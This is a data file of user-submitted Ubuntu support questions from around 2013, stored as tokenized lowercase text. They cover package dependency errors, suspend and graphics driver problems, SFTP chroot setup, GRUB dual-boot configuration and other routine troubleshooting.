261650	dependency problems while updating ubuntu 12.10	i have the following error while trying to update my system : user # apt-get upgrade reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 2 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up linux-image-3.5.0-25-generic ( 3.5.0-25.39 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) failed to symbolic-link /boot/initrd.img-3.5.0-25-generic to initrd.img : file exists at /var/lib/dpkg/info/linux-image-3.5.0-25-generic.postinst line 614. dpkg : error processing linux-image-3.5.0-25-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 17 dpkg : dependency problems prevent configuration of linux-image-extra-3.5.0-25-generic : linux-image-extra-3.5.0-25-generic depends on linux-image-3.5.0-25-generic ; however : package linux-image-3.5.0-25-generic is not configured yet . dpkg : error processing linux-image-extra-3.5.0-25-generic ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : linux-image-3.5.0-25-generic linux-image-extra-3.5.0-25-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 ) any suggestions ?
261657	why does n't suspend work when thinkpad t500 laptop lid is closed when it is working from the command line or from clicking on the gui ?	i 'm running ubuntu 12.10 on my thinkpad t500 with an extra monitor . $ uname -a linux emre-laptop 3.5.0-25-generic # 38-ubuntu smp mon feb 18 23:28:26 utc 2013 i686 i686 i686 gnu/linux the pm-suspend command works perfectly from the command line , fn+f4 ( usual sleep key combination ) works fine , and clicking 'suspend ' from the gui works without any problems : i have also checked my settings , they seem to be fine : but the suspend functionality does n't work when the laptop is closed . when i close the lid the external monitor goes blank , but the laptop does not go into sleep mode . when i open the lid i have a blank screen both on the laptop and the external monitor . i have tried the workaround given at https : //bugs.launchpad.net/ubuntu/+source/gnome-power-manager/+bug/863834 and created a file : $ ls -l /etc/acpi/local/lid.post.sh -rwxr-xr-x 1 root root 696 feb 26 20:31 /etc/acpi/local/lid.post.sh the contents of the file : # ! /bin/bash grep -q closed /proc/acpi/button/lid/*/state if [ $ ? = 0 ] then /usr/sbin/pm-suspend fi any suggestions or workarounds ?
261662	would this headset work with ubuntu ?	this one , by rosewill . it does n't mention ubuntu/linux compatibility , only windows . does anyone know if it works ?
261663	how to setup sftp with chrooted for groups	after many trials and errors trying to setup a working sftp server for multiple groups with chrooted directory i decided to share what finally worked for me . i am a novice 2 months into ubuntu so please do n't shot me yet : ) this is nothing new but i had a hard time finding a complete article that explains how can a novice like me could achieve it . sudo vi /etc/ssh/sshd_config and add subsystem sftp internal-sftp match group group-a chrootdirectory /group-a forcecommand internal-sftp allowtcpforwarding no match group broup-b chrootdirectory /group-b forcecommand internal-sftp allowtcpforwarding no save and exit and start creating the users and group directories : sudo useradd group-a-users sudo useradd group-b-users sudo passwd username sudo usermod -g group-a group-a-users= all users that belong to this group sudo usermod -g group-b group-b-users= all users that belong to this group sudo mkdir /group-a sudo mkdir /group-b sudo mkdir /group-a/upload sudo mkdir /group-b/upload now lets set permission to the directories . the main folder must be own by root and no one should have write access to it by any other user or group or it will result in ssh crashing after restart . sudo chown root /group-a sudo chown root /group-b sudo chmod go-w /group-a sudo chmod go-w /group-b sudo chgrp groupname /group-a/upload sudo chgrp groupname /broup-b/upload sudo chmod ug+rwx /group-a/upload sudo chmod ug+rwx /group-b/upload this is a guide for dummy 's users like me who are new to ubuntu and want to setup a secure sftp server for work or friends .
261671	which distribution for a netbook ?	i have a netbook asus eeepc 1015cx seashell series with integrated graphics , 1gb ram and 1.6ghz processor ( atom ) . i have tried multiple times to get ubuntu 12.10 on it via live usb `` try mode '' but it did n't boot up , all i saw was a black screen with a white blinking `` _ '' . once i 've installed it through wubi and when it finished and rebooted the computer some errors started popping up about certain files missing so i 've aboreted the install . i have tried to get 12.04 which worked but graphics only operated at 800ă600 which is too small as i can achieve 1024ă600 on my w7 starter . so here is my question : which ubuntu version or ubuntu-based distro is best for my netbook , and if it is one of the mentioned above can you suggest a fix to the graphics problem ? thanks .
261674	another black screen with blinking cursor trying to install ubuntu on mac , but i never see this purple screen .	trying to download 12.04.2 ubuntu on mac via cd and stuck at this blinking cursor . there is nothing inbetween boot and this screen . any suggestions ? also my mac has intel hd graphics 4000 . ( if it helps ) help update : i never get to any other screen of any sort besides refit , the link to the similar post applies to people with a screen showing before the endless black cursor does it not ?
261679	ubuntu 12.10 not using current kernel	when performing the sequence of commands : sudo update-grub searching for grub installation directory ... found : /boot/grub searching for default file ... found : /boot/grub/default testing for an existing grub menu.lst file ... found : /boot/grub/menu.lst searching for splash image ... none found , skipping ... found kernel : /boot/vmlinuz-3.5.0-25-generic found kernel : /boot/vmlinuz-3.5.0-24-generic found kernel : /boot/vmlinuz-3.5.0-23-generic found kernel : /boot/vmlinuz-3.2.0-37-generic found kernel : /boot/memtest86+.bin updating /boot/grub/menu.lst ... done uname -r 3.5.0-23-generic sudo apt-get -v install linux-generic linux-image-generic linux-headers-generic reading package lists ... done building dependency tree reading state information ... done linux-generic is already the newest version . linux-headers-generic is already the newest version . linux-image-generic is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 1 not upgraded . i am learning about linux refreshing up on my knowledge , and assistance would be greatly appreciated .
261680	how do i make a wine application start on another screen ?	i have two monitors and wow always starts in the least preferred window . i have tried everything i could to fix this but it just chooses to be difficult . on gnome-shell and cinnamon , when i press the super key , all the windows shrink down and i can move it to the correct screen from there , but unity does not appear to have this feature . how can i move a full screen window that covers the top bar , super drag does not work in wine .
261687	does bumblebee configure your xserver to use the dedicated gpu ?	just wandered if there is a way to use optirun with the desktop environment . anyone know if it works ? edit : i have been reading a lot about bumblebee and still have not found any conformation on whether or not your desktop environment runs with optirun ( using the gpu ) by default or not . or if it even works . i do keep coming back to it to try and figure it out , but so far i have no success . note : bumblebee works fine with my machine ( ubuntu 12.04 , nvidia gt 650m gddr3 2gb graphics )
261688	gaming on ubuntu touch	i am an indie game developer who is interested in targeting ubuntu and ubuntu touch . i have noticed that you support various tools . i am wondering if you support opengl and how much tweaking does a game need to have in order to run properly on ubuntu ? i know that you have different layouts ( tablet , phone , pc , tv ) and i am wondering how would that effect the game development . finally , my game runs on several platforms such as opengl , android , html5 , flash . which one of these is the best to target ubuntu ?
261691	update manager can not update due to dpkg error ... ( ubuntu 12.10 )	i just downloaded the updates to ubuntu 12.10 ; however , when i attempt to install these packages , i get this error [ via update manager ] : installarchives ( ) failed : preconfiguring packages ... preconfiguring packages ... preconfiguring packages ... preconfiguring packages ... dpkg : error : parsing file '/var/lib/dpkg/available ' near line 36442 package 'xserver-xorg-video-intel ' :
261693	unable to unzip file	trying to unzip a file so im trying the following command sorry im really quite new to linux btw this is ubuntu server latest release . user @ serverubuntu : ~/minecraft/server $ ls rtk.zip user @ serverubuntu : ~/minecraft/server $ sudo unzip rtk.zip sudo : unzip : command not found user @ serverubuntu : ~/minecraft/server $ when i try without sudo i get this user @ serverubuntu : ~/minecraft/server $ unzip rtk.zip sorry , command-not-found has crashed ! please file a bug report at : https : //bugs.launchpad.net/command-not-found/+filebug please include the following information with the report : command-not-found version : 0.3 python version : 3.2.3 final 0 distributor id : ubuntu description : ubuntu 12.10 release : 12.10 codename : quantal exception information : unsupported locale setting traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/commandnotfound/util.py '' , line 24 , incrash_guard callback ( ) file `` /usr/lib/command-not-found '' , line 69 , in main enable_i18n ( ) file `` /usr/lib/command-not-found '' , line 40 , in enable_i18n locale.setlocale ( locale.lc_all , '' ) file `` /usr/lib/python3.2/locale.py '' , line 541 , in setlocale return _setlocale ( category , locale ) locale.error : unsupported locale setting thanks in advace
261697	need help with hp 1240us	i have an hp pavillion 1240us . i downloaded ubuntu for first time to try linux everything worked perfect for two weeks not that i was on it much then it gave me a message saying there was an update , now there is no desktop at all have even tried to reload the os for scratch and it still wo n't come back . any suggestions ? ? i 'm a new user and not even that strong a windows user , but like the software a ton until now and i ca n't do anything .
261699	how do i get exaile to remember preferences ?	i 'm using exaile ( with sound menu indicator addon ) and i would like the 'show tray icon ' and 'minimize to tray ' preferences to remain true , but every time i close and reopen exaile these revert to default ( which is false ) . how do i get these preferences to stick ?
261705	is it safe to use a usb after formatting ( even if it may have had a virus )	okay i do n't know if this is a smart question and i found this answer here how do i clear everything ( data , viruses ) from a thumbdrive ? , and did n't understand it fully . i thought formatting a drive was enough to get rid of all data . i used my usb drive in a computer that is clearly messed up . so when i got home i formatted it , and then did a scan ( it 's ubuntu but i have avast installed ) to make sure files transferred between my desktop and laptop are clean , and well there was n't much to scan seeing as i just formatted it , but i understand that apparently you can have hidden files and stuff still ? the scan does n't show anything when i click show hidden files and it also says that its only using 4.1kb ; it always says that ; i 'm guessing that 's for something . so question 1 , is it possible that the virus is still there ? and question 2 if formatting does clean a drive , although it 's linux , would it have infected it , like the way someone can be a carrier of a cold and not be sick .
261710	unable to locate package bitcoin	i have added the official ppa : bitcoin/bitcoin to my software sources and have done sudo apt-get update , but every time i try sudo apt-get install bitcoin this error pops up . : e : unable to locate package bitcoin how can i fix this ?
261715	updates on ubuntu after changing desktop environment	i am planning to switch my desktop environment and i am a noob with linux and ubuntu and i just use it as it is no other software is installed but now i want to change to a different desktop enviroment and my question is that will i still get updates or will it be rooting an android phone i will not get any updates . also will i be able to keep the applications like firefox and libre office to my new desktop ( lxde ) .
261717	problems with touchpad after updating cairo	( still rough translation ) i have a sony vaio vgn-aw180fu with ubuntu 12.04 precise pangolin . everything was fine , until i opened a terminal to install cairo updates that the update center would n't let me install stating that those were untrusted packages . upon installing the updates , the screen froze ; i waited and nothing happended , so i forced a shutdown . then i installed google earth , which previously the software center could n't [ sic ] install , and the screen froze again . again i waited but it did n't change . i forced shutdown once again , and then ubuntu would not start . from grub i entered to `` repair ubuntu '' , and selected `` repair damaged packages '' and could log in again . the laptop touchpad no longer had the normal functions , one being that the pointer moves too fast ; this is the least important , and what bothers me most is that the double tap ( double click ) to open or move windows does not work anymore . this has happened to me before and i had to uninstall and install it all over again . i read that there are many problems with the touchpad for notebooks with ubuntu . it 's a good system that has made me much satisfied and comfortable but the touchpad problems and not knowing how to correct them make it very uncomfortable i might try try with another linux distribution . greetings . original spanish .
261718	how to disable steam check autostarting on every user login ?	i moved steam folder to another partition that 's not mounted at startup using a symlink : how can i move steam 's download folder ? now after every login it thinks it 's not yet installed . i checked the package files and there are no xdg autostart . any suggestion how it even gets launched ? nothing in /etc/xdg/autostart , ~/.config/autostart and in systemsettings . steam- > settings- > interface- > run steam when my computer starts not checked . p.s . i 'm on kde and i do n't want to automount the partition .
261732	ca n't get mac to detect installation media	note : i am following these instructions : dual boot os ubuntu -omg ubuntu . so , for the past few days i 've been trying to install ubuntu on my mac osx because i would really like that extra option of using ubuntu instead of apple 's os . easy enough , right ? well , i first tried installing via a usb but that did n't work ( it kept saying my usb was unreadable ) so i decided i would use one of my blank dvd-rws . i downloaded the ubuntu file and inserted my blank dvd-rw and it just kept spinning until it was ejected by my mac . it 's not the hardware because it is accepting video dvds , it just plain wo n't accept it . i decided burning the .iso file from my pc would work , after burning it on my pc i inserted it into my mac , but my mac still could n't read the dvd . what am i doing wrong ? my mac 's processor is x64 .
261733	how to make sure that my nvidia graphics card drive was updated ?	i have installed ubuntu recently but i coulnd't use the driver which i downloaded from nvidia 's official page and i am not sure it would be better if i was able to install it . i would like to ask how can i make sure my graphics card driver was updated somewhat by ubuntu via internet.. my card is nvidia geforce 210m thanks
261735	bash script to set `` system wide '' proxy settings	i am wondering if there is a command ( or series of commands ) that would do the same thing as network-network proxy-apply system wide . i believe i can export a variable , but i think that that button does more then that ( according to this : how do system wide proxy settings work ? ) . i am wondering if there is a way to fire off the exact thing that this button does from the command line . i am using a socks proxy with ssh , and i am trying to create a bash script that will allow me to proxy system wide , without opening up any guis .
261739	how microsoft office 2010 work ?	im new in using ubuntu 10.14 as my laptop 's os . and i practically need ms office 2010 for my study and work . can someone give me step by step procedure to install the ms ? im also not familiar to wine . please help . thanks !
261740	version of qt creator in ubuntu touch sdk	i have followed the instructions on go mobile to set up for ubuntu touch development and i have a question about the qt creator . in the description of the sdk on http : //developer.ubuntu.com/2013/02/releasing-the-ubuntu-touch-developer-preview-and-sdk-alpha/ , it says they are using qt creator 2.7 . after following the instructions on go mobile , i ran qt creator and checked the version . it says 2.6.82 . however , when checking in the ubuntu software center it says that i have qt creator 2.7 installed . do i have both installed and i am just running the wrong thing ? or is something displaying the wrong version ? it 's worth noting that i was able to follow the instructions for developing the currencyconverter and it worked ok . i just want to know if i am really supposed to be running 2.7 ?
261741	extending postgresql code	in postgresql source code there is a file called postgres.c precisely in /src/backend/tcop/ . inside there is a function called exec_simple_query . i want add a line that call my_function that is in another file called test.c in the same folder of postgres.c . i 'm working with eclipse on linux ( kubuntu/ubuntu ) . i followed this tutorial to creating the environment http : //wiki.postgresql.org/wiki/working_with_eclipse this is test.c : # include `` postgres.h '' # ifndef progprofile_h_ # define progprofile_h_ /* interfaces */ extern void start_create_profile ( list *querytree_list ) ; extern void create_profile ( ) ; extern void check_anomaly ( list *querytree_list ) ; # endif /* test progprof */ void start_create_profile ( list *querytree_list ) { listcell *l ; listcell *tl ; file *f ; //if the file exist just open and write //else create and write f = fopen ( `` queryparsed.txt '' , `` a+ '' ) ; query *query_idr = ( query * ) linitial ( querytree_list ) ; // cmd_select=0 cmd_insert=1 cmd_update=2 switch ( query_idr- > commandtype ) { case cmd_select : fputs ( `` cmd_select , `` , f ) ; break ; case cmd_insert : fputs ( `` cmd_insert , `` , f ) ; break ; case cmd_update : fputs ( `` cmd_update , `` , f ) ; break ; default : break ; } //to have the id of the table foreach ( l , query_idr- > rtable ) { oid tab_idt = ( ( rangetblentry * ) lfirst ( l ) ) - > relid ; //char temp1 [ 10 ] ; char *tab_idtconverted = itoa ( tab_idt ) ; /* this is not a table */ if ( tab_idt == 0 ) continue ; fputs ( `` tab_id : , `` , f ) ; fputs ( tab_idtconverted , f ) ; } //to have the name of the targer list foreach ( tl , query_idr- > targetlist ) { targetentry *tle = ( targetentry * ) lfirst ( tl ) ; oid tab_id = tle- > resorigtbl ; int tab_idcast= ( int ) tab_id ; //char temp [ 10 ] ; char *tab_idconverted = itoa ( tab_idcast ) ; char *resname=tle- > resname ; fputs ( `` name of column : `` , f ) ; fputs ( resname , f ) ; fputs ( `` id : `` , f ) ; fputs ( tab_idconverted , f ) ; fputs ( `` \n '' , f ) ; } //close the file that we write fputs ( `` $ '' , f ) ; fclose ( f ) ; } void create_profile ( ) { } void check_anomaly ( list *querytree_list ) { } but , when i click on build i get this error : description path resource location type make : *** [ all ] error 2 pgsql c/c++ problem make [ 1 ] : *** [ all ] error 2 pgsql c/c++ problem make [ 2 ] : *** [ postgres ] error 1 pgsql c/c++ problem undefined reference to `start_create_profile ' /pgsql/src/backend/tcop postgres.c c/c++ problem i do n't think that is related to postgresql , but i think it is a problem of extension programming .
261749	how do i build nautilus 3.70/3.80 from source ?	i 've upgraded nautilus on my pc to 3.60 with the nice sidebar , but i 'm finding the lack of recursive search difficult . i 've downloaded nautilus 3.7.5 and 3.7.1 which have replaced the recursive search but it wont compile . lots of missing package errors . i was surfing on my ipad while out and i came across a page that listed all the ubuntu dependencies for nautilus 3.7.x and foolishly forgot to bookmark it . rather than painstakingly ./configure ing multiple times and installing the lib # # # # files one by one after a cache search does anyone either know a better way or where i could find that list of dependencies again . thanks . this is one of the messages from one of the packages that is missing . libtracker-sparql-0.14 is the latest in the ubuntu repositories and tracker-0.15 is the latest in the gnome git repository . i 'm okay with downloading that one and trying to install it but would like to put a list together of all the dependencies or find one if someone has already done so , so that this can be installed easily . configure : warning : 'missing ' script is too old or missing configure : error : package requirements ( tracker-sparql-0.16 ) were not met : no package 'tracker-sparql-0.16 ' found consider adjusting the pkg_config_path environment variable if you installed software in a non-standard prefix . alternatively , you may set the environment variables tracker_cflags and tracker_libs to avoid the need to call pkg-config . see the pkg-config man page for more details . the base dependencies are listed on the following page gnome nautilus developer page
261750	use vga switcheroo on macbook pro 8,2 ?	i have used the instructions provided by tomodachi here to get efi kernel stub booting working properly . the radeon card is now properly initialized and lspci is showing both graphics cards , which is appropriate . however , i ca n't seem to use vga switcheroo properly . the problem seems to be modprobe.blacklist=i915 . booting with precisely the options laid out in the answer there : modprobe.blacklist=i915 radeon.modeset=1 seems to disable vga switcheroo , as when i search for the switch file , it tells me /sys/kernel/debug/vgaswitcheroo is not a directory . however , while in ubuntu , if i run : modprobe i915 vgaswitcheroo appears , but i get a weird screen-within-a-screen ( the radeon driver 's environment remains , and the i915 driver draws a slightly smaller second screen in the upper left hand corner almost like a windowless virtual machine ) and running echo off > /sys/kernel/debug/vgaswitcheroo/switch has no apparent effect . the system also disallows me from doing either : modprobe -r radeon or modprobe -r i915 because it says both modules are in use . i 've tried booting with just modeset=1 ( no radeon.modeset or modprobe.blacklist ) and the result is that same screen-within-a-screen . running : modprobe.blacklist=radeon i915.modeset=1 causes the system to boot into low graphics mode . any insights on this ? tomodachi 's answer said `` i got vga switcheroo working '' but i 'm not able to contact him directly due to lack of reputation .
261751	can not get windows 8 to boot after ubuntu 12.10 install ( different hdds )	i just took the plunge into linux , with ubuntu 12.10 . not knowing if i would like ubuntu enough for it to become my main os , i installed it alongside of my existing os , windows 8 . when installing ubuntu , i installed it to a completely separate and empty hard drive.i can boot into ubuntu perfectly fine , and grub shows windows 8 ( loader ) as an option , however when i do try to boot into windows , i receive this : both hard drives are in and working , and i have tried running the recommended settings from boot repair . when my hard drive that has ubuntu installed on it is removed from the system , i can get windows to boot . from ubuntu i can look at my other hard drive , and i see that there is a folder called boot in the home directory , could this possibly be what is causing my problems ? if yes , can i just delete it , or is there a special way to remove it ? and if not , what should i try to remedy this problem ? thanks a ton guys ! contents of grub.cfg # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ x '' $ { feature_menuentry_id } '' = xy ] ; then menuentry_id_option= '' -- id '' else menuentry_id_option= '' '' fi export menuentry_id_option if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { if [ x $ feature_all_video_module = xy ] ; then insmod all_video else insmod efi_gop insmod efi_uga insmod ieee1275_fb insmod vbe insmod vga insmod video_bochs insmod video_cirrus fi } if [ x $ feature_default_font_path = xy ] ; then font=unicode else insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint- efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 795aa714-904a-41e1-b953-4b818caec860 else search -- no-floppy -- fs-uuid -- set=root 795aa714-904a-41e1-b953-4b818caec860 fi font= '' /usr/share/grub/unicode.pf2 '' fi if loadfont $ font ; then set gfxmode=auto load_video insmod gfxterm set locale_dir= $ prefix/locale set lang=en_us insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=10 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ { 1 } '' if [ `` $ { 1 } '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ `` $ { recordfail } '' ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode if [ `` $ { linux_gfx_mode } '' ! = `` text '' ] ; then load_video ; fi menuentry 'ubuntu ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-simple-795aa714-904a-41e1-b953-4b818caec860 ' { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint- efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 795aa714-904a-41e1-b953-4b818caec860 else search -- no-floppy -- fs-uuid -- set=root 795aa714-904a-41e1-b953-4b818caec860 fi linux /boot/vmlinuz-3.5.0-25-generic root=uuid=795aa714-904a-41e1-b953-4b818caec860 ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.5.0-25-generic } submenu 'advanced options for ubuntu ' $ menuentry_id_option 'gnulinux-advanced-795aa714-904a-41e1-b953-4b818caec860 ' { menuentry 'ubuntu , with linux 3.5.0-25-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.5.0-25-generic-advanced-795aa714-904a-41e1-b953-4b818caec860 ' { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 795aa714-904a-41e1-b953-4b818caec860 else search -- no-floppy -- fs-uuid -- set=root 795aa714-904a-41e1-b953-4b818caec860 fi echo 'loading linux 3.5.0-25-generic ... ' linux /boot/vmlinuz-3.5.0-25-generic root=uuid=795aa714-904a-41e1-b953-4b818caec860 ro quiet splash $ vt_handoff echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.5.0-25-generic } menuentry 'ubuntu , with linux 3.5.0-25-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.5.0-25-generic-recovery-795aa714-904a-41e1-b953-4b818caec860 ' { recordfail insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 795aa714-904a-41e1-b953-4b818caec860 else search -- no-floppy -- fs-uuid -- set=root 795aa714-904a-41e1-b953-4b818caec860 fi echo 'loading linux 3.5.0-25-generic ... ' linux /boot/vmlinuz-3.5.0-25-generic root=uuid=795aa714-904a-41e1-b953-4b818caec860 ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.5.0-25-generic } menuentry 'ubuntu , with linux 3.5.0-17-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.5.0-17-generic-advanced-795aa714-904a-41e1-b953-4b818caec860 ' { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 795aa714-904a-41e1-b953-4b818caec860 else search -- no-floppy -- fs-uuid -- set=root 795aa714-904a-41e1-b953-4b818caec860 fi echo 'loading linux 3.5.0-17-generic ... ' linux /boot/vmlinuz-3.5.0-17-generic root=uuid=795aa714-904a-41e1-b953-4b818caec860 ro quiet splash $ vt_handoff echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.5.0-17-generic } menuentry 'ubuntu , with linux 3.5.0-17-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.5.0-17-generic-recovery-795aa714-904a-41e1-b953-4b818caec860 ' { recordfail insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 795aa714-904a-41e1-b953-4b818caec860 else search -- no-floppy -- fs-uuid -- set=root 795aa714-904a-41e1-b953-4b818caec860 fi echo 'loading linux 3.5.0-17-generic ... ' linux /boot/vmlinuz-3.5.0-17-generic root=uuid=795aa714-904a-41e1-b953-4b818caec860 ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.5.0-17-generic } } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry `` memory test ( memtest86+ ) '' { insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 795aa714-904a-41e1-b953-4b818caec860 else search -- no-floppy -- fs-uuid -- set=root 795aa714-904a-41e1-b953-4b818caec860 fi linux16 /boot/memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 795aa714-904a-41e1-b953-4b818caec860 else search -- no-floppy -- fs-uuid -- set=root 795aa714-904a-41e1-b953-4b818caec860 fi linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # menuentry 'dell utility partition ( on /dev/sdb1 ) ' -- class windows -- class os $ menuentry_id_option 'osprober-chain-07d7-090a ' { insmod part_msdos insmod fat set root='hd1 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd1 , msdos1 -- hint-efi=hd1 , msdos1 -- hint-baremetal=ahci1 , msdos1 07d7-090a else search -- no-floppy -- fs-uuid -- set=root 07d7-090a fi drivemap -s ( hd0 ) $ { root } chainloader +1 } menuentry 'windows 8 ( loader ) ( on /dev/sdb3 ) ' -- class windows -- class os $ menuentry_id_option 'osprober-chain-7cbc4093bc404a3a ' { insmod part_msdos insmod ntfs set root='hd1 , msdos3' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd1 , msdos3 -- hint-efi=hd1 , msdos3 -- hint-baremetal=ahci1 , msdos3 7cbc4093bc404a3a else search -- no-floppy -- fs-uuid -- set=root 7cbc4093bc404a3a fi drivemap -s ( hd0 ) $ { root } chainloader +1 } # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/30_uefi-firmware # # # # # # end /etc/grub.d/30_uefi-firmware # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ { config_directory } /custom.cfg ] ; then source $ { config_directory } /custom.cfg elif [ -z `` $ { config_directory } '' -a -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # this is the output of mount and sudo parted /dev/sda print : model : ata hitachi hds72168 ( scsi ) disk /dev/sda : 80.0gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 76.8gb 76.8gb primary ext4 boot 2 76.8gb 80.0gb 3150mb extended 5 76.8gb 80.0gb 3150mb logical linux-swap ( v1 )
261752	do not show devices on the left panel	i do n't want to show the mounted devices on my left panel ( launcher , ubuntu 12.04 ) , and i can just run my ubuntu on 2d mode , so the software myunity tell me `` your ubuntu 12.04 is running in 2d mode . many features will not be available . '' that 's why i ca n't change the option of `` show devices '' to `` never '' . could anybody tell me how not to show the devices on launcher with a command line ?
261755	an error upon installation	please help me to resolve this error . package dependencies can not be resolved this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . details > > the following packages have unmet dependencies : wings3d : depends : erlang-base-hipe ( > = 1:15.b.1-dfsg ) but 1:15.b.1-dfsg-3ubuntu2 is to be installed depends : erlang-abi-15.b but it is a virtual package depends : erlang-wx ( > = 1:15.b.1-dfsg ) but it is not going to be installed depends : erlang-xmerl ( > = 1:15.b.1-dfsg ) but 1:15.b.1-dfsg-3ubuntu2 is to be installed depends : libc6 ( > = 2.14 ) but 2.15-0ubuntu20 is to be installed depends : libjpeg8 ( > = 8c ) but 8c-2ubuntu7 is to be installed im using ubuntu 12.10 this help me to fix this.. thanks a lot..
